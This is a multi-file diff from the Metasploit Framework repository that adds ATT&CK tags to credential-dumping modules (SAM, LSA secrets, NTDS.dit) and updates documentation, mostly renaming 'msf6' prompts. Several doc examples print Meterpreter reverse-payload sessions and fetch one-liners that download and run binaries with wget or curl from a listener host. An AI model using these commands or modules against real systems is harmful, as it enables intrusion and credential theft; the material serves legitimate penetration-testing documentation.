    "ref_name": "windows/gather/credentials/windows_autologin",
@@ -275818,7 +278562,8 @@
      "CVE-2021-36934",
      "URL-https://github.com/GossiTheDog/HiveNightmare",
      "URL-https://isc.sans.edu/diary/Summer+of+SAM+-+incorrect+permissions+on+Windows+1011+hives/27652",
-      "URL-https://github.com/romarroca/SeriousSam"
+      "URL-https://github.com/romarroca/SeriousSam",
+      "ATT&CK-T1003.002"
    ],
    "platform": "Windows",
    "arch": "",
@@ -275826,7 +278571,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/windows/gather/credentials/windows_sam_hivenightmare.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/windows_sam_hivenightmare",
@@ -278006,7 +280751,8 @@
    ],
    "description": "This module gathers a file using the raw NTFS device, bypassing some Windows restrictions\n          such as open file with write lock. Because it avoids the usual file locking issues, it can\n          be used to retrieve files such as NTDS.dit.",
    "references": [
-      "URL-http://www.amazon.com/System-Forensic-Analysis-Brian-Carrier/dp/0321268172/"
+      "URL-http://www.amazon.com/System-Forensic-Analysis-Brian-Carrier/dp/0321268172/",
+      "ATT&CK-T1003.003"
    ],
    "platform": "Windows",
    "arch": "",
@@ -278014,7 +280760,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-03 12:57:40 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/windows/gather/file_from_raw_ntfs.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/file_from_raw_ntfs",
@@ -278358,14 +281104,16 @@
      "hdm <x@hdm.io>"
    ],
    "description": "This module will dump the local user accounts from the SAM database using the registry",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003.002"
+    ],
    "platform": "Windows",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-30 11:23:07 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/windows/gather/hashdump.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/hashdump",
@@ -278436,14 +281184,16 @@
      "Rob Bathurst <rob.bathurst@foundstone.com>"
    ],
    "description": "This module will attempt to enumerate the LSA Secrets keys within the registry. The registry value used is:\n          HKEY_LOCAL_MACHINE\\Security\\Policy\\Secrets\\. Thanks goes to Maurizio Agazzini and Mubix for decrypt\n          code from cachedump.",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003.004"
+    ],
    "platform": "Windows",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-30 11:23:07 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/windows/gather/lsa_secrets.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/lsa_secrets",
@@ -278512,14 +281262,16 @@
      "smashery"
    ],
    "description": "This module creates a memory dump of a process (to disk) and downloads the file\n          for offline analysis.\n\n          Options for DUMP_TYPE affect the completeness of the dump:\n\n          \"full\" retrieves the entire process address space (all allocated pages);\n          \"standard\" excludes image files (e.g. DLLs and EXEs in the address space) as\n          well as memory mapped files. As a result, this option can be significantly\n          smaller in size.",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003.001"
+    ],
    "platform": "Windows",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-30 11:23:07 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/windows/gather/memory_dump.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/memory_dump",
@@ -278635,14 +281387,16 @@
      "Koen Riepe (koen.riepe <Koen Riepe (koen.riepe@fox-it.com)>"
    ],
    "description": "This module uses a powershell script to obtain a copy of the ntds,dit SAM and SYSTEM files on a domain controller.\n          It compresses all these files in a cabinet file called All.cab.",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003.003"
+    ],
    "platform": "Windows",
    "arch": "x86, x64",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-30 11:23:07 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/windows/gather/ntds_grabber.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/ntds_grabber",
@@ -278921,14 +281675,16 @@
      "Carlos Perez <carlos_perez@darkoperator.com>"
    ],
    "description": "This will dump local accounts from the SAM Database. If the target\n          host is a Domain Controller, it will dump the Domain Account Database using the proper\n          technique depending on privilege level, OS and role of the host.",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003.002"
+    ],
    "platform": "Windows",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-30 11:23:07 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/windows/gather/smart_hashdump.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/smart_hashdump",
@@ -279042,7 +281798,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-06-17 12:20:49 +0000",
+    "mod_time": "2025-07-28 12:09:20 +0000",
    "path": "/modules/post/windows/gather/win_privs.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/win_privs",
@@ -279933,7 +282689,8 @@
    "description": "Manage kerberos tickets on a compromised host.",
    "references": [
      "URL-https://github.com/GhostPack/Rubeus",
-      "URL-https://github.com/wavvs/nanorobeus"
+      "URL-https://github.com/wavvs/nanorobeus",
+      "ATT&CK-T1003.004"
    ],
    "platform": "Windows",
    "arch": "",
@@ -279941,7 +282698,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-13 09:23:28 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/windows/manage/kerberos_tickets.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/kerberos_tickets",
@@ -280036,7 +282793,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-06-17 12:20:49 +0000",
+    "mod_time": "2025-07-28 12:09:20 +0000",
    "path": "/modules/post/windows/manage/make_token.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/make_token",
@@ -280402,7 +283159,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-09 10:51:17 +0000",
+    "mod_time": "2025-09-23 16:22:40 +0000",
    "path": "/modules/post/windows/manage/powershell/exec_powershell.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/powershell/exec_powershell",
@@ -10,7 +10,7 @@
 #
 # It's strongly recommended that you check this file into your version control system.

-ActiveRecord::Schema[7.1].define(version: 2025_02_04_172657) do
+ActiveRecord::Schema[7.2].define(version: 2025_02_04_172657) do
  # These are extensions that must be enabled in order to support this database
  enable_extension "plpgsql"

@@ -803,5 +803,4 @@ ActiveRecord::Schema[7.1].define(version: 2025_02_04_172657) do
    t.boolean "limit_to_network", default: false, null: false
    t.boolean "import_fingerprint", default: false
  end
-
 end
@@ -1 +1 @@
-3.2.5
+3.3.8
@@ -1 +1 @@
-Metasploit Documentation
+<img src="{{ '/assets/images/metasploit-logo-dark-external-use.svg' | relative_url }}" alt="Metasploit Logo" class="title-logo" />
@@ -17,7 +17,7 @@ module Rouge
    SHORTNAME = 'z'

    token :Msf, SHORTNAME do
-      # prompt - msf / msf5 / msf6 / meterpreter
+      # prompt - msf / meterpreter
      token :Prompt, "#{SHORTNAME}p"
      # [-]
      token :Error, "#{SHORTNAME}e"
@@ -49,7 +49,7 @@ module Rouge
      state :root do
        mixin :whitespace

-        # Match msf, msf5, msf6, meterpreter
+        # Match msf, meterpreter
        rule %r{^(msf\d?|meterpreter)}, Tokens::Msf::Prompt, :msf_prompt
        rule %r{^\[-\]}, Tokens::Msf::Error
        rule %r{^\[\+\]}, Tokens::Msf::Good
@@ -59,7 +59,7 @@ module Rouge
      end

      # State for highlighting the prompt such as
-      # msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) >
+      # msf auxiliary(admin/dcerpc/cve_2022_26923_certifried) >
      state :msf_prompt do
        mixin :whitespace

@@ -5,6 +5,11 @@
    text-align: justify;
 }

+/* Site logo */
+.title-logo {
+    width: 220px;
+}
+
 /* Color highlighting for msf console text */
 .language-mermaid .label {
    text-transform: inherit;
@@ -1,18 +1,38 @@
-# Chat
+# Primary Communication Channels

-A lot of our discussion happens on IRC in #metasploit on Freenode.
+## GitHub Discussions
+For community support, questions, and general discussion, visit our [GitHub Discussions](https://github.com/rapid7/metasploit-framework/discussions).
+
+## Slack
+Join the [Metasploit Slack](https://join.slack.com/t/metasploit/shared_invite/zt-30i688it0-mJsFGT44IMtdeZi1DraamQ) for real-time chat with the community and developers.
+
+## GitHub Issues
+Submit bug reports and feature requests through [GitHub Issues](https://github.com/rapid7/metasploit-framework/issues).
+
+# Additional Communication Channels
+
+## Chat
+
+Some community discussion still happens on IRC in #metasploit on Freenode.
 Please be patient and hang around for a while -- not everyone is awake
 at the same time as you. =)

-# Mailing list
+## Mailing list

 The Metasploit development mailing list used to be hosted on SourceForge, but is now on Google Groups. Metasploit Hackers is dead, long live [Metasploit Hackers][list]. (Or [mailto:Metasploit Hackers][mailto]).

 The old list [is archived on seclists.org][archive].

+## Social Media
+
+- **X**: [@metasploit](https://x.com/metasploit)
+- **Mastodon**: [@metasploit@infosec.exchange](https://infosec.exchange/@metasploit)
+- **Blog**: [Rapid7 Blog - Metasploit Tag](https://www.rapid7.com/blog/tag/metasploit/)
+- **YouTube**: [Metasploit YouTube](https://youtube.com/@MetasploitR7)
+
 # Abuse

-Instances of abusive, harassing, or otherwise unacceptable behavior may be reported to msfdev@metasploit.com which goes to all the current committers. If the incident involves a committer, you may report directly to caitlin_condon@rapid7.com or todb@metasploit.com.
+Instances of abusive, harassing, or otherwise unacceptable behavior may be reported to msfdev@metasploit.com which goes to all the current committers. If the incident involves a committer, you may report directly to smcintyre@metasploit.com or jacquelyn_harris@rapid7.com.


 [archive]: http://seclists.org/metasploit/ "Metasploit mailing list archive"
@@ -12,8 +12,10 @@ The pgp signatures below can be verified with the following [public key](https:/

 | Download Link                                                                                                                                                |File Type| SHA                                                                                                                       | PGP                                                                                                                      |
 |--------------------------------------------------------------------------------------------------------------------------------------------------------------|-|---------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------|
-| [metasploit-4.22.7-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe)                    | Windows 64-bit | [SHA256](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha256)               | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)                    |
-| [metasploit-4.22.7-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run)                          | Windows 64-bit | [SHA256](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha256)                 | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)                      |
+| [metasploit-4.22.8-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe)                    | Windows 64-bit | [SHA256](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha256)               | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)                    |
+| [metasploit-4.22.8-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run)                          | Linux 64-bit | [SHA256](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha256)                 | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)                      |
+| [metasploit-4.22.7-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-windows-x64-installer.exe.asc) |
+| [metasploit-4.22.7-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-linux-x64-installer.run.asc)   |
 | [metasploit-4.22.6-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-windows-x64-installer.exe.asc) |
 | [metasploit-4.22.6-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-linux-x64-installer.run.asc)   |
 | [metasploit-4.22.5-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-windows-x64-installer.exe.asc) |
@@ -290,7 +290,7 @@ end
 msfconsole output:

 ```msf
-msf6 exploit(windows/smb/msf_smb_client_test) > options
+msf exploit(windows/smb/msf_smb_client_test) > options

 Module options (exploit/windows/smb/msf_smb_client_test):

@@ -319,7 +319,7 @@ Exploit target:
   0   Windows


-msf6 exploit(windows/smb/msf_smb_client_test) > run
+msf exploit(windows/smb/msf_smb_client_test) > run

 [*] Started reverse SSL handler on 172.16.60.1:4444
 [*] 172.16.60.128:445 - Create and write to Windows\Temp\payload.bat on \\172.16.60.128\C$ remote share
@@ -407,7 +407,7 @@ end
 msfconsole output:

 ```msf
-msf6 exploit(windows/smb/ruby_smb_client_test) > options
+msf exploit(windows/smb/ruby_smb_client_test) > options

 Module options (exploit/windows/smb/ruby_smb_client_test):

@@ -436,7 +436,7 @@ Exploit target:
   0   Windows


-msf6 exploit(windows/smb/ruby_smb_client_test) > run
+msf exploit(windows/smb/ruby_smb_client_test) > run

 [*] Started reverse SSL handler on 172.16.60.1:4444
 [*] 172.16.60.128:445 - Create and write to Windows\Temp\payload.bat on \\172.16.60.128\C$ remote share
@@ -18,7 +18,7 @@ puts identify_hash "_9G..8147mpcfKT8g0U."
 ```
 In practice, we receive the following output from this:
 ```ruby
-msf5 > irb
+msf > irb
 [*] Starting IRB shell...
 [*] You are in the "framework" object

@@ -4,7 +4,7 @@ They are designed to have a very loose definition in order to make them as usefu
 Plugins are not available by default, they need to be loaded:

 ```msf
-msf6 > load plugin_name
+msf > load plugin_name
 ```

 Plugins can be automatically loaded and configured on msfconsole's start up by configuring a custom `~/.msf4/msfconsole.rc` file:
@@ -61,9 +61,9 @@ The current available plugins for Metasploit can be found by running the `load -
 The Alias plugin adds the ability to alias console commands:

 ```msf
-msf6 > load alias
+msf > load alias
 [*] Successfully loaded plugin: alias
-msf6 > alias -h
+msf > alias -h
 Usage: alias [options] [name [value]]

 OPTIONS:
@@ -76,20 +76,20 @@ OPTIONS:
 Register an alias such as `proxy_enable`:

 ```msf
-msf6 > alias proxy_enable "set Proxies http:localhost:8079"
+msf > alias proxy_enable "set Proxies http:localhost:8079"
 ```

 Now when running the aliased `proxy_enable` command, the proxy datastore value will be set for the current module:

 ```msf
-msf6 auxiliary(scanner/http/title) > proxy_enable
+msf auxiliary(scanner/http/title) > proxy_enable
 Proxies => http:localhost:8079
 ```

 Viewing registered aliases:

 ```msf
-msf6 > alias
+msf > alias

 Current Aliases
 ===============
@@ -122,9 +122,9 @@ To use the plugin, it must first be loaded. That will provide the `captureg` com
 and stop subcommands. In the following example, the plugin is loaded, and then all default services are started on the 192.168.159.128 interface.

 ```msf
-msf6 > load capture
+msf > load capture
 [*] Successfully loaded plugin: Credential Capture
-msf6 > captureg start --ip 192.168.159.128
+msf > captureg start --ip 192.168.159.128
 Logging results to /home/smcintyre/.msf4/logs/captures/capture_local_20220325104416_589275.txt
 Hash results stored in /home/smcintyre/.msf4/loot/captures/capture_local_20220325104416_612808
 [+] Authentication Capture: DRDA (DB2, Informix, Derby) started
@@ -150,7 +150,7 @@ Hash results stored in /home/smcintyre/.msf4/loot/captures/capture_local_2022032
 [+] LLMNR Spoofer started
 [+] mDNS Spoofer started
 [+] Started capture jobs
-msf6 >
+msf >
 ```

 This content was originally posted on the [Rapid7 Blog](https://www.rapid7.com/blog/post/2022/03/25/metasploit-weekly-wrap-up-154/).
@@ -19,7 +19,7 @@ Metasploit's DNS configuration is controlled by the `dns` command which has mult
 The current configuration can be printed by running `dns print`:

 ```msf
-msf6 > dns print
+msf > dns print
 Default search domain: N/A
 Default search list:   lab.lan
 Current cache size:    0
@@ -12,7 +12,7 @@ msf auxiliary(oracle_login) > run
 ```
 or
 ```msf
-msf5 auxiliary(scanner/oracle/oracle_hashdump) > run
+msf auxiliary(scanner/oracle/oracle_hashdump) > run

 [-] Failed to load the OCI library: cannot load such file -- oci8
 [-] Try 'gem install ruby-oci8'
@@ -76,27 +76,27 @@ $ dig +short 4.tcp.ngrok.io

 metasploit side:
 ```msf
-msf6 > use payload/windows/x64/meterpreter/reverse_http
-msf6 payload(windows/x64/meterpreter/reverse_http) > set LHOST 192.0.2.1
+msf > use payload/windows/x64/meterpreter/reverse_http
+msf payload(windows/x64/meterpreter/reverse_http) > set LHOST 192.0.2.1
 LHOST => 192.0.2.1
-msf6 payload(windows/x64/meterpreter/reverse_http) > set LPORT 17511
+msf payload(windows/x64/meterpreter/reverse_http) > set LPORT 17511
 LPORT => 17511
-msf6 payload(windows/x64/meterpreter/reverse_http) > set ReverseListenerBindAddress 127.0.0.1
+msf payload(windows/x64/meterpreter/reverse_http) > set ReverseListenerBindAddress 127.0.0.1
 ReverseListenerBindAddress => 127.0.0.1
-msf6 payload(windows/x64/meterpreter/reverse_http) > set ReverseListenerBindPort 4444
+msf payload(windows/x64/meterpreter/reverse_http) > set ReverseListenerBindPort 4444
 ReverseListenerBindPort => 4444
-msf6 payload(windows/x64/meterpreter/reverse_http) > to_handler 
+msf payload(windows/x64/meterpreter/reverse_http) > to_handler 
 [*] Payload Handler Started as Job 2
-msf6 payload(windows/x64/meterpreter/reverse_http) > 
+msf payload(windows/x64/meterpreter/reverse_http) > 
 [*] Started HTTP reverse handler on http://127.0.0.1:4444

-msf6 payload(windows/x64/meterpreter/reverse_http) > generate -f exe -o ngrok_payload.exe
+msf payload(windows/x64/meterpreter/reverse_http) > generate -f exe -o ngrok_payload.exe
 [*] Writing 7168 bytes to ngrok_payload.exe...
-msf6 payload(windows/x64/meterpreter/reverse_http) > 
+msf payload(windows/x64/meterpreter/reverse_http) > 
 [*] http://127.0.0.1:4444 handling request from 127.0.0.1; (UUID: ghzekibo) Staging x64 payload (202844 bytes) ...
 [*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:55468) at 2024-09-10 16:43:58 -0400

-msf6 payload(windows/x64/meterpreter/reverse_http) > sessions -i -1
+msf payload(windows/x64/meterpreter/reverse_http) > sessions -i -1
 [*] Starting interaction with 1...

 meterpreter > getuid
@@ -43,8 +43,8 @@ The fastest way to understand Fetch Payloads is to use them and examine the outp
 target with the ability to connect back to us with  an HTTP connection and a command execution vulnerability.
 First, let's look at the payload in isolation:
 ```msf
-msf6 exploit(multi/ssh/sshexec) > use payload/cmd/linux/http/x64/meterpreter/reverse_tcp
-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > show options
+msf exploit(multi/ssh/sshexec) > use payload/cmd/linux/http/x64/meterpreter/reverse_tcp
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > show options

 Module options (payload/cmd/linux/http/x64/meterpreter/reverse_tcp):

@@ -62,7 +62,7 @@ LPORT               4444             yes       The listen port

 View the full module info with the info, or info -d command.

-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > 
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > 
 ```

 ### Options
@@ -106,19 +106,19 @@ payload, we would see different options.

 ### Generating the Fetch Payload
 ```msf
-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_COMMAND WGET
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_COMMAND WGET
 FETCH_COMMAND => WGET
-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_SRVHOST 10.5.135.201
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_SRVHOST 10.5.135.201
 FETCH_SRVHOST => 10.5.135.201
-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_SRVPORT 8000
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_SRVPORT 8000
 FETCH_SRVPORT => 8000
-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set LHOST 10.5.135.201
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set LHOST 10.5.135.201
 LHOST => 10.5.135.201
-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set LPORT 4567
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set LPORT 4567
 LPORT => 4567
-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > generate -f raw
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > generate -f raw
 wget -qO ./YXeSdwsoEfOH http://10.5.135.201:8000/3cP1jDrJ3uWM1WrsRx3HTw; chmod +x ./YXeSdwsoEfOH; ./YXeSdwsoEfOH &
-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > 
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > 
 ```

 You can see the fetch payload generated:
@@ -130,7 +130,7 @@ When you start the `Fetch Handler`, it starts both the server hosting the binary
 served payload.  With `verbose` set to `true`, you can see both the Fetch Handler and the Served Payload Handler are
 started:
 ```msf
-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > to_handler
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > to_handler
 [*] wget -qO ./YBybOrAmkV http://10.5.135.201:8000/3cP1jDrJ3uWM1WrsRx3HTw; chmod +x ./YBybOrAmkV; ./YBybOrAmkV &
 [*] Payload Handler Started as Job 0
 [*] Fetch Handler listening on 10.5.135.201:8000
@@ -142,7 +142,7 @@ msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > to_handler
 The Fetch Handler is tracked with the Served Payload Handler, so you will only see the Served Payload Handler under
 `Jobs`, even though the Fetch Handler is listening:
 ```msf
-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > jobs -l
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > jobs -l

 Jobs
 ====
@@ -151,7 +151,7 @@ Jobs
  --  ----                    -------                                     ------------
  0   Exploit: multi/handler  cmd/linux/http/x64/meterpreter/reverse_tcp  tcp://10.5.135.201:4567

-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > netstat -ant | grep 8000
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > netstat -ant | grep 8000
 [*] exec: netstat -ant | grep 8000

 tcp        0      0 10.5.135.201:8000       0.0.0.0:*               LISTEN     
@@ -159,13 +159,13 @@ tcp        0      0 10.5.135.201:8000       0.0.0.0:*               LISTEN
 ```
 Killing the Served Payload handler will kill the Fetch Handler as well:
 ```msf
-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > jobs -k 0
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > jobs -k 0
 [*] Stopping the following job(s): 0
 [*] Stopping job 0
-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > netstat -ant | grep 8000
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > netstat -ant | grep 8000
 [*] exec: netstat -ant | grep 8000

-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > 
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > 
 ```

 ## Using Fetch Payloads on the Fly
@@ -183,7 +183,7 @@ The following example shows both the original command to download and execute th
 original fetch command directly to the shell.  Since this requires two downloads, it is less stealthy, but the
 command to run on the target is significantly shorter.
 ``` msf
-msf6 payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > to_handler
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > to_handler
 [*] Command served: curl -so %TEMP%\DpRdBIfeyax.exe http://10.5.135.117:8080/zw3LGTh9FtaLJ4bCQRAWdw & start /B %TEMP%\DpRdBIfeyax.exe

 [*] Command to run on remote host: curl -s http://10.5.135.117:8080/test|cmd
@@ -290,7 +290,7 @@ Then, you can set `FetchListenerBindPort` to 3069 and get the callback correctly
 4) Because tftp is a udp-based protocol and because od the implementation of the server within Framework, each time you
 start a tftp fetch handler, a new service will start:
 ```msf
-msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > jobs
+msf payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > jobs

 Jobs
 ====
@@ -299,16 +299,16 @@ Jobs
  --  ----                    -------                                       ------------
  2   Exploit: multi/handler  cmd/windows/tftp/x64/meterpreter/reverse_tcp  tcp://10.5.135.201:4444

-msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set LPORT 4445
+msf payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set LPORT 4445
 LPORT => 4445
-msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > to_handler
+msf payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > to_handler

 [*] Command to run on remote host: curl -so plEYxIdBQna.exe tftp://10.5.135.201:8080/test1 & start /B plEYxIdBQna.exe
 [*] Payload Handler Started as Job 4

 [*] starting tftpserver on 10.5.135.201:8080
 [*] Started reverse TCP handler on 10.5.135.201:4445 
-msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > jobs
+msf payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > jobs

 Jobs
 ====
@@ -318,23 +318,23 @@ Jobs
  2   Exploit: multi/handler  cmd/windows/tftp/x64/meterpreter/reverse_tcp  tcp://10.5.135.201:4444
  4   Exploit: multi/handler  cmd/windows/tftp/x64/meterpreter/reverse_tcp  tcp://10.5.135.201:4445

-msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > netstat -an | grep 8080
+msf payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > netstat -an | grep 8080
 [*] exec: netstat -an | grep 8080

 udp        0      0 10.5.135.201:8080       0.0.0.0:*                          
 udp        0      0 10.5.135.201:8080       0.0.0.0:*                          
-msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set FETCH_URIPATH test4
+msf payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set FETCH_URIPATH test4
 FETCH_URIPATH => test4
-msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set LPORT 8547
+msf payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set LPORT 8547
 LPORT => 8547
-msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > to_handler
+msf payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > to_handler

 [*] Command to run on remote host: curl -so DOjmRoCOSMn.exe tftp://10.5.135.201:8080/test4 & start /B DOjmRoCOSMn.exe
 [*] Payload Handler Started as Job 5

 [*] starting tftpserver on 10.5.135.201:8080
 [*] Started reverse TCP handler on 10.5.135.201:8547 
-msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > netstat -an | grep 8080
+msf payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > netstat -an | grep 8080
 [*] exec: netstat -an | grep 8080

 udp        0      0 10.5.135.201:8080       0.0.0.0:*                          
@@ -7,7 +7,7 @@
 There are two methods of adding a module to the favorites list. The first way is via simply calling `favorite` when there is an active module:

 ```shell
-msf6 exploit(multi/handler) > favorite
+msf exploit(multi/handler) > favorite
 [+] Added exploit/multi/handler to the favorite modules file
 ```

@@ -15,7 +15,7 @@ msf6 exploit(multi/handler) > favorite
 Using the active module without an active module will print the `favorite` command help output:

 ```shell
-msf6 > favorite
+msf > favorite
 [-] No module has been provided to favorite.
 Usage: favorite [mod1 mod2 ...]

@@ -35,10 +35,10 @@ OPTIONS:
 The second method of adding favorites allows adding multiple modules at once:

 ```msf
-msf6 > favorite exploit/multi/handler exploit/windows/smb/psexec
+msf > favorite exploit/multi/handler exploit/windows/smb/psexec
 [+] Added exploit/multi/handler to the favorite modules file
 [+] Added exploit/windows/smb/psexec to the favorite modules file
-msf6 > show favorites
+msf > show favorites

 Favorites
 =========
@@ -59,14 +59,14 @@ Modules can be deleted from the favorites list individually or by clearing the c
 #### Deleting an active module from favorites list

 ```shell
